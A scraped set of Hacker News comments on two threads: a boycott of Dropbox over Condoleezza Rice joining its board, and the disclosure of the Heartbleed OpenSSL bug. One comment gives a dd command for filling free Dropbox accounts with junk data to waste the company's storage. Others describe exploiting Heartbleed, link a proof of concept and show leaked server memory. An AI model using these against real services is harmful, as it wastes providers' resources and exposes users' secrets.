That said, any US company doesn't have much choice when it comes to handing over information so I don't know how big of an impact this will have in practice.

cpt1138 3 days ago 0 replies      
Rice brings Enterprise and Government contracts. In terms of Dropbox's valuation, I don't really see consumer dollars justifying any business model they have. Just look to Palantir if you want to see an example of a service that does very well with no consumer dollars at all.
VuongN 3 days ago 0 replies      
If you find yourself needing to use Dropbox (or other cloud providers) for one reason or another, I would humbly suggest giving us a try: https://www.ncryptedcloud.com/. We try to remedy the situation by allowing what cloud storage providers do best: syncing & sharing of data and we secure them. Having the data without the correct key render the data useless to any prying eyes.
johnpowell 3 days ago 0 replies      
On 20 March 2003 I was a student studying accounting at Portland State University. By the end of the night I tried to block the Burnside bridge and the cops beat the shit out of me on the south-side steps for protesting the war..
bsaul 3 days ago 0 replies      
This post is wrong on so many level it's not even fun...

Instead of denouncing the fact that a corporate has to hire political figures for their influence ( upon whom ?) it's a never ending list of clichs about good politician ( like obama letting the syrian people die, i suppose ?) vs bad politicians ( the world would have been such a better place with saddamn hussein !) from the point of view of a 5 year old.

Grow up a bit, please.

rjohnk 3 days ago 0 replies      
Why is this? Because she was a part of the Bush administration? Because she is a Republican and we should hate Republicans? I mean, come on, isn't Al Gore on Apple's Board? He's no saint! No. This is not an issue of partisanship."

They then proceed to bring mostly partisan viewpoints to the table. This is usually what those on the left do (yes, yes, I know, not all). Set things up as non-partisan and then proceed partisan attacks. We have A) Iraq War was wrong B) Torture and Bush lacky C)Warrant-less wiretaps D) BIG SCARY OIL

Let us back up and acknowledge that Congress okayed much of this, so any member at the time who is now a board member of any company should also be tarred and feathered.

You have the right to disagree with dropbox, but come on, drop the "this isn't partisan" partisan arguments.

crazy1van 3 days ago 0 replies      
My thoughts as I read this article:

"She helped start the Iraq War"Ok, that was a costly war with a lousy outcome.

"She was involved in the creation of the Bush administration's torture program"Ok, torture and no due process seems pretty antithetical to a free society.

"Rice not only supports warrantless wiretaps, she authorized several"Ok, I like the 4th amendment and that weakened it even more.

"Rice was on the Board of Directors at Chevron"Omg, what did Chevron do on the same order as torture and warrantless wiretapping??? Oh, turns out nothing. Or at least this article offers no evidence. Kinda weakens the whole argument.

ezrameanshelp 3 days ago 0 replies      
This is why my company's board is 100% cyborgs.
acconrad 3 days ago 0 replies      
If we collectively invested 1/10th of this passion towards real problems (like boycotting mega banks for the billions they stole during the financial crisis) instead of whether or not my free hard drive is advised by a ex-high-ranking politician, we'd be getting a lot more done.
jcolemorr11 3 days ago 0 replies      
Maybe I'm the only one who's thinking like this but...

...It's just Dropbox.

"But she access to ALL THE THINGS!"

I highly doubt Dropbox will intentionally jeopardize the meat of their business model. And again. It's just Dropbox. Not the golden keys to nuclear warfare or even a tech mover and shaker like Google.

What I want to know is why a highly educated, over qualified, former leader of the country is joining a cloud storage company. Her skill set could be leveraged so much better elsewhere. It's just...what the hell. That's what's confusing me. Not her wielding political influence to rename my file extensions to .nsa or .chevy.

frik 3 days ago 0 replies      
Wow the HN anti flamewar algo (as someone mentioned)...

As Dropbox is a YC alumi it puts also a bad light on HN.

mason240 3 days ago 1 reply      
Looks like we are living a new age of McCarthyism.
grannyg00se 3 days ago 1 reply      
I'm sure that bringing Brendan Eich's politics into question when he moved into CEO position has made this a more popular trend.
theorique 3 days ago 3 replies      
Why all this politicization of Rice's role? What possible relevance could her actions (or hysterical descriptions of her actions) in the Bush administration have in regards to her role as a board member of Dropbox?

Most likely, this is a political appointment to get Dropbox connections in Washington, to sell large contracts into the federal government. And, possibly, to sell into governments abroad where Ms Rice's connections may also be of value. (None of which has any relevance to the usefulness of their product to me.)

pbreit 3 days ago 0 replies      
At first, this Democrat thought this was a joke. I'm prepared to believe it still might be a show of how ridiculous this line of thinking is.

Rice is a huge "get" for Dropbox who I think has a good chance to be a significant asset for Dropbox once all this dust blows over. Rice has demonstrated time and again that she works for her team. In this case, that could mean making Dropbox the strongest, securest offering in the market. She is bright, well-connected and effective. Hardly anyone is mentioning her tenure at Stanford which is obviously a big plus for the company.

I don't see strong parallels to the Mozilla case. Different role, different company, different subject.

jqm 2 days ago 0 replies      
I just deleted my Dropbox account. It was a free account anyway.I found it contained about GB of files I hadn't accessed in a couple of years.

Then I realized....

What a wise move on the part of Dropbox to bring Rice on board. They probably will free up a few Petabytes of space from non-paying geeks:)

cm-t 3 days ago 0 replies      
I linked this thread to /r/ubuntu since they might be concerned with the shutdown of Ubuntu One:


joeblau 3 days ago 0 replies      
That escalated quickly! This is a pretty strong digital political attacks to be lobbied against a tech company. I'm curious to see what response Dropbox will have.
elwell 3 days ago 0 replies      
Just curious; what services would you not abandon if say, Bashar Al-Assad were to join the board?

I thought maybe GMail for me, but then I decided maybe there aren't any services I wouldn't leave.

hueving 3 days ago 0 replies      
Can someone explain to me how being involved with Chevron is unethical?
whistlerbrk 3 days ago 1 reply      
Oh please. Every American here, myself included, started the war in Iraq and helped pass the Patriot Act by electing these buffoons and not throwing them out of office. The fault is within ourselves.
elwell 3 days ago 1 reply      
It should be noted that her consulting firm [0] has been advising Dropbox for the last year.

[0] - http://www.ricehadleygates.com/

caycep 3 days ago 0 replies      
One could argue she was the temporizing influence in that administration...without her, Cheney and co would have had unchecked free reign...
don_draper 3 days ago 1 reply      
What's a good sync solution for 1Password that doesn't use Dropbox?
jliptzin 3 days ago 0 replies      
I've been meaning to switch to Google Drive for a while now, this is a nice catalyst to actually get me to do it.
api 3 days ago 1 reply      
Funny the reaction of so many against this. If it's okay to vote by ballot, why is it not okay to vote by dollar? They're your dollars. It's perfectly fine to choose not to give them to companies that do things or whose leadership holds views you disagree with.

Dollars are far more powerful mechanisms of voting than ballots IMHO. Imagine if everyone investigated the leadership of companies they did business with and refused to buy from companies whose leadership supported unnecessary war, discrimination, etc.? If indeed it is corporate leadership that really leads the country, then corporate leadership might be a more important target for change than governmental leadership.

higherpurpose 3 days ago 0 replies      
What a brain-dead decision by Dropbox. I can't believe they actually thought of this themselves and decided what a great idea it would be to have someone like Condoleezza Rice on the board.

For some reason I expected a little more from a YC star.

loupeabody 3 days ago 2 replies      
I find the explicit images of war and torture very distasteful. Especially alongside a goofy illustration of Condoleezza's head in the Dropbox logo. There are certainly more appropriate ways to communicate your message besides FUD.
joshdance 3 days ago 1 reply      
I was hoping this would be a site that would review and compare cloud storage alternatives.
Grue3 3 days ago 0 replies      
Oh boy, yet another idiotic witch hunt. I'm sure the author uses only software written exclusively by people with purest intentions.
sugarfactory 3 days ago 0 replies      
You shouldn't use any of the alternatives listed here either. Because none of those supports encryption. All the cloud storage services which do not provide encryption are unexceptionally evil. Because given the easiness of implementing an encryption feature, not to implement it means the administrators of a service are willing to see users' files.
VikingCoder 3 days ago 1 reply      
Who's next on their Board of Directors, Linda Tripp?
avani 3 days ago 1 reply      
I'm not about to read through 600 comments to find out if someone has already asked, so apologies in advance, but what is the state of viable dropbox alternatives right now? Through their college promotions and puzzle hunts, I have ~20GB of free storage there (afaik in perpetuity). Is there anything comparable?
newsreader 3 days ago 0 replies      
Dropbox deciding to employ Condoleezza Rice is not reason enough for me to drop Dropbox; sorry. I will continue to use Dropbox, OneDrive, Google Drive, Box, and whatever else is out there.
microjesus 3 days ago 0 replies      
So as a vocal, technically proficient and wealthy segment; we are now basically a lobby group. Minus third party funding, hidden agendas and three piece suits. I love this. I think that using our significant influence to form an opinion followed by digital exertion of will is simply of mirror of formal politics. Game on.
ewams 3 days ago 0 replies      
paulhauggis 3 days ago 0 replies      
Why does it seem like all of these campaigns are against right-leaning people?

if this is the kind of tactics you need to use to win, I hope you never win.

havaze 3 days ago 0 replies      
This is insane. All that's done here is seeking a scapegoat that can be hold responsible for everything. This is nonsense, the American people are responsible for the decisions of the very same people they voted for, and nobody else. She never has held a democratically elected office you say? That doesn't matter either, the system which allowed this to happen was.

Now I'm not saying dropping dropbox is an unreasonable decision, privacy concerns come to mind, but what's one of the options the article suggests as replacement? Ah yes Microsoft, one of the most "evil" companies in existence. So we trade one evil for another, but wait there is more! What's about the companies that made you mobile phone, clothing, car and the other thousand things you use in your daily life? Well, if you finished checking every single one of them, and dropping products from the "evil" ones then please send me an email with a list of goodies that can be considered ethical. Or wait, you'll not have a computer any more at this point.

rodolphoarruda 3 days ago 0 replies      
That picture of a dead girl is really disturbing. The link should have some sort of warning for graphic content.
jon_black 3 days ago 0 replies      
I'm tempted to write nothing more than the following quote:

"You must be the change you wish to see in the world." - Mahatma Gandhi

But of course, Ms. Rice would probably have said the same thing about the reasons why she made the decisions she did.

We are all struggling with the same thing. I want/expect/believe the following, and here is my excuse/reason/proof of it. I find it hard to be open minded when so many are driven by their dirty ideals - myself included.

vvpan 3 days ago 0 replies      
This article reminded me - why aren't the people from Bush administration in prison?
mantrax4 3 days ago 1 reply      
Internet outrage - one the most promising resources of the 21st century.

It's cheap, it's renewable, and the Internet is producing more of it than we can handle.

If we could figure out how to power engines with Internet outrage, we'd solve all of our world's problems.

Right now it's mostly producing angry tweets and protest pages, but I'm sure if we work together we'll figure it out, eventually.

Until then, keep the outrage coming! I believe in outrage!

caiob 3 days ago 1 reply      
I call this internet bullying. I'm most def not gonna stop using a product just because I don't agree with the ideas of one person in the team.This makes me wonder if Google, Microsoft, Box or even Amazon aren't behind this kinda message; y'know trying to make it viral and stuff...
scottydelta 3 days ago 0 replies      
Well I have been planning to host my own dropbox like service on my own server for myself and I think now is the high time that I do!! Bye bye Dropbox!!
lohankin 3 days ago 0 replies      
If I open a thread "Drop HN", will it be published here? The site did more than enough during the last week to promote hate and intolerance. What do you think?
KhalilK 3 days ago 0 replies      
There's a broken reference in the site:<a href="www.foxnews.com/politics/2009/04/22/bush-adviser-rice-gave-ok-waterboard/">lied about the extent to which she was involved</a>

Fix:Add http:// to the link.

exodust 3 days ago 0 replies      
It's not enough reason to drop dropbox.

I'd need a more serious reason, like if the service deleted all my data.

BTW, I recommend Keepass in combination with dropbox for a good reliable password manager. The file is encrypted before sent to dropbox, so Rice won't be able to snoop in your passwords.... Or will she? ;-)

mkr-hn 3 days ago 1 reply      
This seems like a prime candidate for being moderated off the front page, but it's still at #1.
gesman 3 days ago 0 replies      
If one's major business depends on DropBox's righteousness and nobility - then these points become more or less valid.

For millions of others who use it just to backup stuff - what matters much more is the cost of the service rather then the resume of board members.

It's good for everyone to stir the waters though to show that the world at large is not sleeping any more.

sys32768 3 days ago 0 replies      
Safe to assume the persons behind the 900+ comments here approve of the political views and actions of the Hacker News owners and staff?

Dang, I guess I do!

bogwog 3 days ago 0 replies      
The only thing this article said which I agreed with was the wiretapping part. The other stuff: torture, Chevron, the war in Iraq, etc had nothing to do with Dropbox
pritambaral 3 days ago 0 replies      
The fb share link has href="http://www.facebook.com/share.php?u=<url>". It still functions though, js triggered.
news_to_me 3 days ago 0 replies      
I disagree with product boycotts in general, including this one. It means we're "voting with dollars", which means people with more dollars have more votes.
chrisBob 3 days ago 0 replies      
If you really don't like dropbox you won't tell people to quit. You will tell them to get free accounts and:

dd if=/dev/random of=~/Dropbox/junkFile bs=1024 count=1000000Adjusting the count according to the account size (obviously).

If you do it again a few minutes later they will even help you out and store both copies!

mac1175 3 days ago 0 replies      
There should have been some warning on this link. That picture of that grieving (I assume) father was too much. I get the point the author is trying to make but it didn't have to be an /r/wtf subreddit.
mbeattie 3 days ago 0 replies      
"HEY HERE ARE SOME NON-PARTISAN REASONS TO NOT LIKE CONDI:partisan reason number 1partisan reason number 2reason 3 is validpartisan reason number 4"
dangayle 3 days ago 2 replies      
But Guido van Rossum works for Dropbox, are we supposed to not support Guido?

These witch hunts hurt a lot of people, much more than the single figurehead that everyone get all up in arms over.

Houshalter 3 days ago 0 replies      
This is incredibly childish HN. First the guy from firefox and now this. Politics is the Mind-Killer.


araftery 3 days ago 0 replies      
> No. This is not an issue of partisanship.

Yes it is. Nearly every reason on there is partisan. Say what you want about "trustworthiness" and the fact that having an "untrustworthy" person on a cloud service provider's board is worrisome. Frankly, it's not. Even if Rice were untrustworthy, I don't think my data would be in any danger.

If you're going to make complaints on partisan grounds, at least don't veil them as some kind of assessment of character.

macinjosh 3 days ago 2 replies      
I thought Silicon Valley was dying for more women and minorities to join their ranks! Rice is both so shouldn't we all be elated?!

Oh, she's a Republican? Fuck her.

DanielBMarkham 3 days ago 1 reply      
I'm not even going to ask you guys to stop with the angry villager thing. Almost a thousand of you upvoted it, you must be enjoying yourselves.

But I will ask that you take this off HN. All kinds of people in the world. They do all kinds of things and hold all kinds of opinions. I don't want to visit HN each morning and find the top item is the result of the latest googling and angry mob. Go get a room or something. It's not only that it's not interesting, it's actively non-productive. Every minute you spend with this is a minute you could be doing something better with your life -- the current person of outrage has nothing to do with anything. Trust me, there'll be a new one next week.

Just get a room. Take it somewhere else. Please.

nomadcoop 3 days ago 1 reply      
Anyone know of a Dropbox equivalent based in Europe?
rpowers 3 days ago 0 replies      
No. This is not a trend I wish to support. Turning private business decisions into politicized movements is not cool.
donnfelker 3 days ago 0 replies      
"Its not about who you know, its about who knows you."
hrish2006 3 days ago 0 replies      
Bit torrent sync!
sidcool 3 days ago 1 reply      
I appreciate your feelings towards the matter, but I don't support your action. An open letter to Drew Houston would have been enough. It's a corporation, we cannot force it to do something we want to. Boycotting them is not a good option.
dfa0 3 days ago 0 replies      
Vote with your bits[and dollars] if you disagree.

Nerd rage alone is fruitless without tangible follow-thru.

mattbeck 3 days ago 0 replies      

I was just hilariously accused of being a racist for tweeting the #dropdropbox hash tag.

boston1999 3 days ago 1 reply      
Politics aside, I don't see what she can contribute to a technology company like Dropbox!
dbg31415 3 days ago 0 replies      
Worked at Firefox... should work at Dropbox, right?
orochi235 3 days ago 0 replies      
I can't help but notice that whoever is behind this campaign found it necessary to give attribution to the people who produced the images on the page, and provided helpful links to Dropbox's CEO's social media accounts, but didn't bother to sign his own name to the cause. That's the very definition of gutless.
stevehawk 3 days ago 0 replies      
I have full faith that that website is the dumbest thing I will have read this month.
jays 3 days ago 0 replies      
Dropbox certainly has lost some peoples trust.

What makes any of the other companies more trustworthy though? Has someone personally interviewed all the employees, performed a security audit of their system, and determined they are legit?

Seems like a false sense of security.

up_and_up 3 days ago 0 replies      
Seems like an extremely odd selection to me as well as politically charged.
glisom 3 days ago 0 replies      
Eich donated $1,000 to a campaign he agreed with. Rice helped run part of the country you are lucky enough to live in. Get over yourselves. I bet everyone of you would work at Dropbox or Mozilla in an instance, even if they were prominent figures in the company.
p0nce 3 days ago 0 replies      
HubiC is 25 free gigs.
knightofmars 3 days ago 0 replies      
I'm a little suspicious about this whole thing. I want to know who authored this website. Otherwise I hate to say it but I have to assume it is a hit-piece produced by "Box.com" to get people to leave Dropbox.
diestl 3 days ago 1 reply      
I just switched to Google Drive, it's cheaper as well.
peeze 3 days ago 0 replies      
I thought this was going to be about Heartbleed...darn.
taivare 3 days ago 0 replies      
Im going to'Dropbox'before I ever pick it up !
jokoon 3 days ago 0 replies      
dropbox is not a good product, and will never be. so I'm not concerned. tech unsavvy people use those kinds of products, and that's how you spy on so many people.

I'm not surprised, and I don't care, because most people don't really care to understand the implications of technology and the implications it can have, and that's exactly how you rule over uneducated smartphone and computer users.

mikeash 3 days ago 0 replies      
Here are some things I've "learned" from the comments in this thread:

1. Public discussion and encouraging people to vote with their wallet does not belong in a civil society.

2. Nonviolent grassroots campaigns are anti-democratic.

3. It's OK to do terrible things as long as you had good intentions.

Seriously, are you guys all completely insane? The quality of these comments is just amazingly bad. It goes beyond the standard "internet bad" comments full of trolling and bad reasoning, and over the edge into "actively ridiculous".

I'm sure there are good arguments to be made against this but they aren't being made here. Please think about what you're about to write makes any kind of sense before you comment.

Edit: if I were more conspiracy minded, I'd be wondering if the Brendan Eich affair was deliberately created as a weak example to create a wedge and discredit the whole idea of attacking companies based on the politics of their high-level people. It certainly strikes me as unlikely that there would be so many negative comments towards this if the Eich business hadn't first put so many people in that mood.

twcooper 3 days ago 0 replies      
Basically, the argument is to Drop Dropbox because Condi was a part of the Bush administration and is a Republican.
payapp 3 days ago 0 replies      
Drew@dropboox - bad move...
digitalcraft 3 days ago 0 replies      
drop everything, after all you have the NSA - silly
elliott34 3 days ago 0 replies      
grow up
ozh 3 days ago 0 replies      
3 words: not gonna happen.
davidgaw 3 days ago 0 replies      
The way I would "drop Dropbox" if they or Rice give in to this shameful attack on diversity of thought. Otherwise, thanks in part to this effort, I will remain a loyal Dropbox customer for life.
sebastialonso 3 days ago 1 reply      
>Why is this? Because she was a part of the Bush administration? Because she is a Republican and we should hate Republicans? I mean, come on, isn't Al Gore on Apple's Board? He's no saint!

>No. This is not an issue of partisanship.

Okay, let's read on then...

3 of the 4 reasons OP explained are directly linked with her being a part of the Bush Administration.

I do believe having Ms. Rice on board is a bad idea. But please don't say one say one thing ("it's not because she was a part of the Bush administration") and then do other ("IT IS because she was a part of the Bush administration").

Bad way to get people behind you, and makes you look painfully unserious.

fredgrott 3 days ago 1 reply      
Okay lets describe this with satire..

How Many of you Voted for Bush Sr? If you did you are just as guilty as dropbox..

Oh please...

davidkellis 3 days ago 2 replies      
Why is this on HN? This is just a political powder keg. Anyone who agrees with the article will upvote it and any comment supporting it. Anyone who disagrees with the article will downvote it and any comment opposing it.

The only "benefit" to this post is that the publicity given to the grievance (whether real or imagined) will sway Dropbox leadership to drop Condi. Whether that's a good thing or not for Dropbox as a business is not even considered. The content of the article has no real benefit to anyone.

Shivetya 3 days ago 0 replies      
Wholly disagree.

However I am always amazed how much effort so many here put into trying to take offense, show their claimed offense, instead of acting when similar if not worse is coming from the current administration.

Really guys, grow the fuck up.

We do not know all the facts that Rice and others in her position had let alone the options available. We did however have our time back them to rail against them yet the same railing against her are fawning over the drone assassin we have in office now.

So honest, take your fake angst, your damnable wannabe clique and shove it. You do nothing with the evil at your door today only to jump on the train of least resistance.

Oh, its easy to pillory Rice, Bush, or any of those evil Republicans, but damn if you stand up to those in power now. At least Snowden did, he has done more than the rest of this site will ever do.

vdaniuk 3 days ago 0 replies      
Yeah, approving torture is a "good faith decision", right.
The Heartbleed Bug heartbleed.com
1628 points by tptacek  6 days ago   518 comments top 80
yaakov34 6 days ago 16 replies      
There was a discussion here a few years ago (https://news.ycombinator.com/item?id=2686580) about memory vulnerabilities in C. Some people tried to argue back then that various protections offered by modern OSs and runtimes, such as address space randomization, and the availability of tools like Valgrind for finding memory access bugs, mitigates this. I really recommend re-reading that discussion.

My opinion, then and now, is that C and other languages without memory checks are unsuitable for writing secure code. Plainly unsuitable. They need to be restricted to writing a small core system, preferably small enough that it can be checked using formal (proof-based) methods, and all the rest, including all application logic, should be written using managed code (such as C#, Java, or whatever - I have no preference).

This vulnerability is the result of yet another missing bound check. It wasn't discovered by Valgrind or some such tool, since it is not normally triggered - it needs to be triggered maliciously or by a testing protocol which is smart enough to look for it (a very difficult thing to do, as I explained on the original thread).

The fact is that no programmer is good enough to write code which is free from such vulnerabilities. Programmers are, after all, trained and skilled in following the logic of their program. But in languages without bounds checks, that logic can fall away as the computer starts reading or executing raw memory, which is no longer connected to specific variables or lines of code in your program. All non-bounds-checked languages expose multiple levels of the computer to the program, and you are kidding yourself if you think you can handle this better than the OpenSSL team.

We can't end all bugs in software, but we can plug this seemingly endless source of bugs which has been affecting the Internet since the Morris worm. It has now cost us a two-year window in which 70% of our internet traffic was potentially exposed. It will cost us more before we manage to end it.

phillmv 6 days ago 4 replies      
Given the severity of this bug, the UX of the site is failing anyone who isn't a fulltime sysadmin.

Suggestion: big, bold TLDR ("The sky is falling. Check your OpenSSL version right now") with a link on what to do sorted by OS vendor.

Step 1:Here's a command to spit out your OpenSSL version. If it is the following string, go to step 2.

Step 2:Here's how to update your OpenSSL. Here are links to guides on reissuing keys.

Probably OK the whole remediation bit links to a wiki that gets updated as the various vendors push their patches.

FiloSottile 6 days ago 6 replies      
I've built a web tester for this bug, find it at


It actually exploit the bug, since it was quite trivial, and echo some memory.

It's written in Go, no more than 100 lines. I'll release code in some time.

oskarth 6 days ago 2 replies      
This thing has been in the wild for two years. What are the odds it hasn't been systematically abused? And what does this imply?

To me it sounds kind of like finding out the fence in your backyard was cut open two years ago. Except in this case the backyard is two thirds of the internet.

MartinMond 6 days ago 6 replies      
As of now (21:04 UTC) this isn't fixed in Debian https://security-tracker.debian.org/tracker/CVE-2014-0160 nor Ubuntu http://people.canonical.com/~ubuntu-security/cve/2014/CVE-20...

Got a long night ahead :/

userbinator 6 days ago 2 replies      
I think the summary is a bit too sensationalistic in terms of what the actual security implications are:

The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software.

Yes, while that's true, it's not a "read the whole process' memory" vulnerability which would definitely be cause for panic. The details are subtle:

Can attacker access only 64k of the memory?There is no total of 64 kilobytes limitation to the attack, that limit applies only to a single heartbeat. Attacker can either keep reconnecting or during an active TLS connection keep requesting arbitrary number of 64 kilobyte chunks of memory content until enough secrets are revealed.

The address space of a process is normally far bigger than 64KB, and while the bug does allow an arbitrary number of 64KB reads, it is important to note that the attacker cannot directly control where that 64KB will come from. If you're lucky, you'll get a whole bunch of keys. If you're unlucky, you might get unencrypted data you sent/received, which you would have anyway. If you're really unlucky, you get 64KB of zero bytes every time.

Then there's also the question of knowing exactly what/where the actual secrets are. Encryption keys (should) look like random data, and there's a lot of other random-looking stuff in crypto libraries' state. Even supposing you know that there is a key, of some type, somewhere in a 64KB block of random-looking data, you still need to find where inside that data the key is, what type of key it is, and more importantly, whose traffic it protects before you can do anything malicious.

Without using any privileged information or credentials we were able steal from ourselves the secret keys

It really helps when looking for keys, if you already know what the keys are.

In other words, while this is a cause for concern, it's not anywhere near "everything is wide open", and that is probably the reason why it has remained undiscovered for so long.

Edit: downvotes. Care to explain?

lawl 6 days ago 1 reply      
Holy shit. That seems worse than the debian openssl debacle.

If i got that right ALL openssl private keys are now potentially compromised.

I hope vendors push fixes soon, and then I guess I'm busy for a few days regenerating private keys.

cheald 6 days ago 1 reply      
What a great writeup. Comprehensive without being overly verbose, answers to "what does this mean?" and "does this affect me?", and clear calls to action.

While I'm not happy at having to spend my Monday patching a kajillion machines, I welcome more vulnerability writeups in this vein.

gojomo 6 days ago 1 reply      
Does SSH (specifically sshd) on major OSes use affected versions of OpenSSL? [answer pulled up from replies below: since sshd doesn't use TLS protocol, it isn't affected by this bug, even if it does use affected OpenSSL versions]

What's the quickest check to see if sshd, or any other listening process, is vulnerable?

(For example, if "lsof | grep ssl" only shows 0.9.8-ish version numbers, is that a good sign?)

mattparlane 6 days ago 1 reply      
What worries me about this is that the commit that fixes it [0] doesn't include any tests. Is that normal in crypto? If I committed a fix to a show-stopper bug without any tests at my day job I'd feel very amateur.

[0] http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=...

whyleyc 6 days ago 1 reply      
This doesn't sound like "responsible disclosure" to me - how can Codenomicon dump this news when all the major Linux vendors don't have patches ready to go ?
perturbation 5 days ago 0 replies      
Node.js sort-of dodged a bullet here. It includes a version of openssl that it links against when building the crypto module (and, I would think, the tls module). Node.js v0.10.26 uses OpenSSL 1.0.1e 11 Feb 2013.

However (in openssl.gyp):https://github.com/joyent/node/blob/master/deps/openssl/open...

It disables the heartbeat with the compile time option due to a workaround for Microsoft's IIS, of all things.

So the affected window for node would have been Sep 11, 2012 to Mar 27, 2013 (based on the commit history).

te_chris 6 days ago 1 reply      
Great writeup but I guess I'm still a bit confused. As someone responsible for rails servers I can see that I need to update nginx and openssl as soon as packages become available or compile myself. What about keys though? Do I need to get our SSL certs re-issued? regenerate SSH keys? Anything else that I should be doing?
Donch 5 days ago 0 replies      

  ./bin/Heartbleed openssl.org:443  2014/04/08 12:15:44 ([]uint8) {   00000000  02 00 79 68 65 61 72 74  62 6c 65 65 64 2e 66 69  |..yheartbleed.fi|   00000010  6c 69 70 70 6f 2e 69 6f  59 45 4c 4c 4f 57 20 53  |lippo.ioYELLOW S|   00000020  55 42 4d 41 52 49 4e 45  47 69 05 e8 90 a6 60 d6  |UBMARINEGi....`.|   00000030  b4 18 c3 f0 4a 20 40 3a  ef dd 06 8b 87 32 42 00  |....J @:.....2B.|   00000040  00 00 10 00 0e 00 00 0b  6f 70 65 6e 73 73 6c 2e  |........openssl.|   00000050  6f 72 67 00 05 00 05 01  00 00 00 00 00 0a 00 08  |org.............|   00000060  00 06 00 17 00 18 00 19  00 0b 00 02 01 00 00 0d  |................|   00000070  00 0a 00 08 04 01 04 03  02 01 02 03 09 14 ce 7c  |...............||   00000080  6d 0c f5 a0 3b cc 16 aa  3b d4 b1 b8              |m...;...;...|  }  2014/04/08 12:15:44 openssl.org:443 - VULNERABLE

iso8859-1 6 days ago 2 replies      
Here's the patch/commit, I don't know why it's not linked form the OpenSSL changelog or heartbleed.com. A suspicious lack of transparency.


chomp 6 days ago 1 reply      
How did Cloudflare get access to this bug a week before it was made public, yet no distro has a package ready?

How's that for responsible disclosure?

halter73 6 days ago 1 reply      
> Recovery from this bug could benefit if the new version of the OpenSSL would both fix the bug and disable heartbeat temporarily until some future version... If only vulnerable versions of OpenSSL would continue to respond to the heartbeat for next few months then large scale coordinated response to reach owners of vulnerable services would become more feasible.

This sounds risky to me. I'm afraid attackers would benefit more from this decision than coordinated do-gooders.

dkarapetyan 6 days ago 1 reply      
Honestly, why aren't the formal verification people jumping on this? I keep hearing about automatic code generation from proof systems like Coq and Agda but it's always some toy example like iterative version of fibonacci from the recursive version or something else just as mundane. Wouldn't cryptography be a perfect playground for making new discoveries? At the end of the day all crypto is just number theory and number theory is as formal a system as it gets. Why don't we have formal proofs for correct functionality of OpenSSL? Instead of a thousand eyes looking at pointers and making sure they all point to the right places why don't we formally prove it? I don't mean me but maybe some grad student.
IgorPartola 6 days ago 2 replies      
What are the chances that the NSA is having a field day with this in the 24-48 hours that it will take everyone to respond? Also, is it possible that CA's have been compromised to the point where root certs should not be trusted?
ineedtosleep 6 days ago 8 replies      
A couple more data points:

I'm running Fedora 19 and Arch on my main dev machines/VMs and as of this posting are considered up-to-date. Both are vulnerable:

    [Fedora19] $ openssl version    OpenSSL 1.0.1e-fips 11 Feb 2013    [Arch] $ openssl version    OpenSSL 1.0.1f 6 Jan 2014

comice 5 days ago 0 replies      
Remember that checking services for the OpenSSL heartbleed vulnerability without permission is actually illegal in many countries (UK in particular).
ahomescu1 5 days ago 0 replies      
What's interesting is that RFC 1122 from 1989 warned about problems like these, and gave a very good approach to prevent them from occurring:

At every layer of the protocols, there is a general rule whose application can lead to enormous benefits in robustness and interoperability

[IP:1]: "Be liberal in what you accept, and conservative in what you send"

Software should be written to deal with every conceivable error, no matter how unlikely; sooner or later a packet will come in with that particular combination of errors and attributes, and unless the software is prepared, chaos can ensue. In general, it is best to assume that the network is filled with malevolent entities that will send in packets designed to have the worst possible effect. This assumption will lead to suitable protective design, although the most serious problems in the Internet have been caused by unenvisaged mechanisms triggered by low-probability events; [...]

Gygash 5 days ago 3 replies      
Found a Python PoC: http://s3.jspenguin.org/ssltest.py

Edit: and just used it to dump 64K from a known-vulnerable device we control. Got a session cookie. Jeez.

mpyne 6 days ago 1 reply      
Whoa, this seems horrifying.

One (selfish) question I have is whether this can affect primary key material stored in an HSM. I'm assuming not, but that the session key generated by the HSM would still be susceptible.

tlrobinson 6 days ago 0 replies      
"Is there a bright side to all this?"

"Yes, we can sell you our software!"

lkbm 3 days ago 0 replies      
So, Google and Codenomicon independently found this two-year-old vulnerability at approximately the same time? How does that happen? Are they both looking at the same publicly-shared fuzzing data, or was there a patch that suddenly made it more obvious?

The obvious concern would be that one found it a good while ago, and just didn't bother announcing it until the other team was anyway. I don't believe that's what happened here, but I'm curious what the mechanism actually was.

ParadisoShlee 6 days ago 0 replies      
Note that this bug affects way more programs than just Tor expect everybody who runs an https webserver to be scrambling today.

"If you need strong anonymity or privacy on the Internet, you might want to stay away from the Internet entirely for the next few days while things settle." - torProject

syncsynchalt 5 days ago 1 reply      
Note: if you use mint.com, it's likely hitting your banks with your login on your behalf today. You'll still want to change those passwords even if you didn't use banking sites during the known vulnerability window.
zmillman 6 days ago 3 replies      
Does anyone know how Amazon's Elastic Load Balancers are affected? I can't find anything on the AWS site
hf 5 days ago 1 reply      
Over 300.000 LoC:

    ~/tmp/openssl-1.0.1g $ find . -name "*.c" | xargs wc -l  | tail -n1      349834 total
This is too much by at least one order of magnitude.What's the going price for a crypto-level code review(I'm not even saying audit) these days?

Is all this code necessary for state-of-the art encryption orisn't it rather backwards compatibility baggage?If the latter: how much could be gained by splitting the projectinto '-current' and '-not'?

kseifried 6 days ago 0 replies      
mstrem 6 days ago 2 replies      
From the CloudFlare blog: "This bug fix is a successful example of what is called responsible disclosure".

I just discovered this now and

    yum info openssl
Yields 1.0.1e as available package which is vulnerable. I guess not all "stakeholders" have been warned properly - or am I jumping to conclusions?

bch 6 days ago 0 replies      
All references I see recommend (for 1.0.1-series) to move to 1.0.1g - but the OpenSSL homepage[0] says that 1.0.1g is a Work in Progress. There is a download[1] link for it though. Anybody have definitive answer for what's going on here? It's a little confusing.

  [0] http://www.openssl.org/news/state.html  [1] http://www.openssl.org/source/

huherto 6 days ago 3 replies      
Is it a problem for those using ssh keys on github ?
46Bit 6 days ago 0 replies      
How widely implemented is certificate revocation?
gojomo 6 days ago 2 replies      
What popular SSL client software uses the vulnerable OpenSSL? (Any web browsers, for example on popular linuxes? How about 'curl' when connecting to HTTPS sites?)
dschiptsov 4 days ago 0 replies      
So, basically, it is the consequence of "quickly adding an implementation" of an extension of the TLS protocol to otherwise mature, more-or-less solid and "slightly" audited (at least by OpenBSD and FreeBSD teams) code base. OK. It happens.

btw, is OpenBSD affected or they did the job well by not blindly adding an unnecessary stuff (extensions) and bumping the versions without auditing the changes?

malandrew 6 days ago 1 reply      
